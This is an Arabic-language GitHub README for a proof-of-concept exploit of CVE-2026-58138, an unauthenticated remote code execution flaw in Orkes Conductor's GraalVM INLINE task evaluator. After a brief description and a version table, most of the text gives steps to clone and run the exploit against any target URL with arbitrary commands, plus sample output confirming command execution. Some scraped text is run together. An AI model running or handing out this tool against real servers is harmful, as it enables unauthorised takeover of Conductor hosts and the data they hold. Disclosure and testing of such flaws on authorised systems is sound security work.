
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) ثغرة RCE بدون مصادقة عبر مُقيّم GraalVM INLINE
ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Orkes Conductor
CVE-2026-58138 هي ثغرة حرجة تتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة، وتؤثر على Orkes Conductor في الإصدارات من 3.21.21 حتى 3.30.1. تسمح هذه الثغرة للمهاجمين بتنفيذ أوامر عشوائية على خادم Conductor دون الحاجة إلى أي مصادقة، مما قد يؤدي إلى اختراق شامل للنظام.
توجد الثغرة في نوع مهمة INLINE داخل محرك سير العمل في Orkes Conductor. تدعم مهمة INLINE تنفيذ JavaScript مع الوصول إلى كائنات Java عبر eval، مما يسمح للمهاجم بما يلي:
INLINE مع كود JavaScriptjava.lang.Runtime.exec()| نطاق الإصدار | الحالة |
|---|---|
| 3.21.21 - 3.30.1 | ✅ مُتأثر |
| > 3.30.1 | ❌ تم إصلاحه |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 أو أحدثلأغراض تعليمية وبحوث أمنية فقط. استخدمها فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها.
⭐ هل وجدت هذا مفيدًا؟ امنحه نجمة على GitHub ⭐